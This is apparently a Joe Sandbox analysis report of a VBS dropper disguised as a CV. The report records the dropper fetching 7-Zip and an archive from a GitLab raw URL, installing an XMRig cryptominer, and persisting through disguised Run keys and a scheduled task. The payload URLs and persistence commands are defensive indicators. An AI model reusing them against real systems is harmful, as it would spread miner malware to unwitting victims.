Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.7-zip.org	49.12.202.237	true	false		high
gitlab.com	172.65.251.78	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.7-zip.org/a/7zr.exe	false		high
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.7-zip.org/;K	wscript.exe, 00000004.00000003.2459381341.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462687833.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461318223.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.7-zip.org/a/7zr.execal	wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/-/sandbox/;	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
http://microsoft.co	wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461282573.000001ADB85CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462864277.000001ADB85CD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://new-sentry.gitlab.net	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://snowplow.trx.gitlab.net	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://collector.prd-278964.gl-product-analytics.com	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseP	wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.7-zip.org/a/7zr.exey	wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseO	wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xmrig.com/wizard	7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://gitlab.com/	wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB8589000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB8588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB8579000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false.IE5	wscript.exe, 00000004.00000003.2415078899.000001ADB83A2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falseY	wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false	7g.exe, 0000000B.00000003.2417873855.0000000001490000.00000004.00001000.00020000.00000000.sdmp, sarmat.vbs.11.dr	false		high
https://www.7-zip.org/a/7zr.exel	wscript.exe, 00000004.00000003.2415078899.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2456895737.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462581282.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459641900.000001ADB83B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/-/sandbox/	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/admin/	wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/assets/	wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://customers.gitlab.com	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/t	wscript.exe, 00000004.00000003.2414886871.000001ADB856C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://gitlab.com/-/speedscope/index.html	wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=false&	wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xmrig.com/docs/algorithms	7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	false	URL Reputation: safe	unknown
https://sourcegraph.com	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2458037507.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462657412.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459381341.000001ADB850B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falsen	wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.nirsoft.net/	7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	false		high
https://www.7-zip.org/	wscript.exe, 00000004.00000003.2459381341.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2457524824.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460007160.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462687833.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461318223.000001ADB8536000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sentry.gitlab.net	wscript.exe, 00000004.00000003.2415051573.000001ADB850C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB8562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415078899.000001ADB837C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2415065858.000001ADB8511000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://gitlab.com/cv4500942/cv/-/raw/main/gmail.7z?inline=falsex	wscript.exe, 00000004.00000003.2458037507.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2462809130.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2460502761.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2461110939.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gitlab.com/calls	wscript.exe, 00000004.00000003.2414886871.000001ADB85AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.recaptcha.net/	wscript.exe, 00000004.00000003.2459247464.000001ADB8675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.65.251.78	gitlab.com	United States	13335	CLOUDFLARENETUS	false
49.12.202.237	www.7-zip.org	Germany	24940	HETZNER-ASDE	false
141.94.96.144	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	true

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1369672
Start date and time:	2024-01-04 08:48:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	curriculum_vitae-copie.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.mine.winVBS@27/19@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 99 Number of non-executed functions: 151
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:49:11	API Interceptor	25x Sleep call for process: powershell.exe modified
08:49:36	Task Scheduler	Run new task: MicrosoftUpdateService path: wscript.exe s>C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
08:49:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
08:49:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
08:50:36	API Interceptor	10969x Sleep call for process: mservice.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.65.251.78	build_setup.exe	Get hash	malicious	Vidar	Browse	gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
49.12.202.237	[FTUApps.com] - TextPad v9.0.1 (x64) Portable.zip	Get hash	malicious	Unknown	Browse	7-zip.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gitlab.com	vn.cmd	Get hash	malicious	Unknown	Browse	172.65.251.78
	curriculum_vitae-copie_(1).vbs	Get hash	malicious	Xmrig	Browse	172.65.251.78
	https://gitlab.com/ezsyfitlo/docs/-/raw/main/transaction_details_7f03a8029c0e4d95667aceb9cccab7c5.zip	Get hash	malicious	Unknown	Browse	172.65.251.78
	KFCV2ASugW.exe	Get hash	malicious	Unknown	Browse	172.65.251.78
	KFCV2ASugW.exe	Get hash	malicious	Unknown	Browse	172.65.251.78
	curriculum_vitae-copie.vbs	Get hash	malicious	Xmrig	Browse	172.65.251.78
	CrashHandler2.exe	Get hash	malicious	Unknown	Browse	172.65.251.78
	curriculum_vitae-copie.vbs	Get hash	malicious	Unknown	Browse	172.65.251.78
	curriculum_vitae-copie.vbs	Get hash	malicious	Unknown	Browse	172.65.251.78
	61242Pp10w.exe	Get hash	malicious	DCRat, RedLine, SmokeLoader	Browse	172.65.251.78
	p4pEBxCplv.exe	Get hash	malicious	DCRat, RedLine, SmokeLoader	Browse	172.65.251.78
	JC4Fer2SNi.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	172.65.251.78
	rain.exe	Get hash	malicious	AsyncRAT	Browse	172.65.251.78
	Blender 2.93.0 Crack Key 3D (Torrent) Free Download Downloader.exe	Get hash	malicious	RedLine	Browse	172.65.251.78
	tmpBA2F.vbs	Get hash	malicious	Unknown	Browse	172.65.251.78
	tmp3F72.vbs	Get hash	malicious	Unknown	Browse	172.65.251.78
	tmp381D.vbs	Get hash	malicious	Unknown	Browse	172.65.251.78
	tmpE473.vbs	Get hash	malicious	Unknown	Browse	172.65.251.78
	ProtonVPN 2.4.31 Crack Full Working License Key Download Downloader.exe	Get hash	malicious	RedLine	Browse	172.65.251.78
www.7-zip.org	SPARKtApplication.exe	Get hash	malicious	Unknown	Browse	49.12.202.237
	DocScan-09-28-150.js	Get hash	malicious	IcedID	Browse	49.12.202.237
	convert-pdf-429.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	convert-pdf-429.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	convert-pdf-538.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	convert-pdf-538.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	curriculum_vitae-copie_(1).vbs	Get hash	malicious	Xmrig	Browse	49.12.202.237
	INV-Details-Jul2023.pdf.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	INV-Details-Jul2023.pdf.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	Invoice_Details.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	Invoice_Details.js	Get hash	malicious	Unknown	Browse	49.12.202.237
	curriculum_vitae-copie.vbs	Get hash	malicious	Xmrig	Browse	49.12.202.237
	7z2201_setup.msi	Get hash	malicious	Unknown	Browse	49.12.202.237

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	https://fvytvgh.blob.core.windows.net/vhgvhcg/6503.html	Get hash	malicious	Phisher	Browse	176.9.26.34
	https://drive.google.com/file/d/1FES-ilIgDK8aY-l0WDjuU_r-5xHYO257/view?usp=sharing_eip_m&ts=658b61c4&sh=G9iUz3WHSlBcIUFB&ca=1&exids=71685779,71685773	Get hash	malicious	Unknown	Browse	5.161.204.250
	vwuuQ7uC81.lnk	Get hash	malicious	Ducktail	Browse	138.201.8.186
	pP6bBWVCQQ.elf	Get hash	malicious	Unknown	Browse	148.251.14.84
	Zxf5vHRSrw.exe	Get hash	malicious	BazaLoader	Browse	116.203.23.183
	Setup.exe	Get hash	malicious	Vidar	Browse	116.203.3.205
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	116.203.123.207
	JKfLgrv17o.elf	Get hash	malicious	Mirai	Browse	88.198.32.219
	tuc2.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	tuc2.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	SecuriteInfo.com.FileRepMalware.17033.29620.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	prog.apk	Get hash	malicious	AndrMonitor	Browse	144.76.58.8
	lRvwSklMhg.exe	Get hash	malicious	RedLine	Browse	5.75.214.47
	https://faq-kak.ru/kak-najti-svoyu-biblioteku-v-steam/	Get hash	malicious	Unknown	Browse	94.130.221.58
	lRvwSklMhg.exe	Get hash	malicious	RedLine	Browse	5.75.214.47
	SecuriteInfo.com.FileRepMalware.30895.23071.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	SecuriteInfo.com.Trojan-Dropper.Win32.Agent.20630.27649.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	SecuriteInfo.com.Trojan-Dropper.Win32.Agent.18975.25923.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	SecuriteInfo.com.Trojan-Dropper.Win32.Agent.28344.8313.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
	SecuriteInfo.com.Trojan-Dropper.Win32.Agent.20351.10542.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse	176.9.47.240
CLOUDFLARENETUS	6TBdUvQH7L.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc	Browse	104.21.76.57
	https://optout.oracle-zoominfo-notice.com/acton/ct/45126/s-008a-2401/Bct/g-00c4/l-00bc:213923/ct1_0/1/lu?sid=TV2%3AvrSt7gYip	Get hash	malicious	Unknown	Browse	172.67.199.186
	Hesap_Ekstresi_11956117.PDF.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.18.115.97
	hesaphareketi-01.pdf.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.18.114.97
	Dekont.pdf.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.18.114.97
	confirmationcr.vbs	Get hash	malicious	Redline Clipper	Browse	104.21.70.240
	New_Voice_Message_from_(7936740467).vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	104.21.89.193
	Digital_marketing_recruitment_materials_2024.lnk	Get hash	malicious	Unknown	Browse	104.21.80.70
	http://pub-e0fbd798f1254106a8d627bd480831e7.r2.dev/index_update.html/	Get hash	malicious	Unknown	Browse	104.16.123.96
	9b1VuX8WEI.exe	Get hash	malicious	Amadey, Glupteba	Browse	172.67.186.198
	B2AUFF22T7.exe	Get hash	malicious	Glupteba, Stealc, Vidar	Browse	104.21.76.57
	toolspub2.exe	Get hash	malicious	Betabot, SmokeLoader	Browse	172.67.172.189
	toolspub1.exe	Get hash	malicious	Betabot, SmokeLoader	Browse	104.21.30.102
	L5KPHu6Vfn.exe	Get hash	malicious	LummaC, Petite Virus, Quasar, RedLine, SmokeLoader, Stealc, Vidar	Browse	104.21.24.252
	http://nanochecker.com	Get hash	malicious	Unknown	Browse	172.67.186.41
	https://share-one-paper-46a2.rilceharrlyeav.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.18.12.192
	https://fitzmaths.com/	Get hash	malicious	TechSupportScam	Browse	104.18.10.207
	https://usps.redelivery.status.103-23-199-211.cprapid.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://att-103527-101942.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.18.131.236

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	6TBdUvQH7L.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc	Browse	49.12.202.237 172.65.251.78
	9b1VuX8WEI.exe	Get hash	malicious	Amadey, Glupteba	Browse	49.12.202.237 172.65.251.78
	B2AUFF22T7.exe	Get hash	malicious	Glupteba, Stealc, Vidar	Browse	49.12.202.237 172.65.251.78
	QuarkHub.dll	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	QuarkHub.dll	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	HexaTracer.dll	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	ep_setup.exe	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	SecuriteInfo.com.Trojan.Inject2.830.6488.6761.exe	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	SecuriteInfo.com.Variant.Mikey.151510.2976.16417.exe	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	SecuriteInfo.com.Variant.Zusy.508517.2343.1060.exe	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	Setup.exe	Get hash	malicious	Vidar	Browse	49.12.202.237 172.65.251.78
	buildz.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	49.12.202.237 172.65.251.78
	V8F7xkP66A.exe	Get hash	malicious	Xmrig	Browse	49.12.202.237 172.65.251.78
	Mk7woAn6lz.exe	Get hash	malicious	Babuk, Djvu	Browse	49.12.202.237 172.65.251.78
	Setup.msi	Get hash	malicious	Unknown	Browse	49.12.202.237 172.65.251.78
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	49.12.202.237 172.65.251.78
	4dej5mvuGp.exe	Get hash	malicious	RisePro Stealer	Browse	49.12.202.237 172.65.251.78
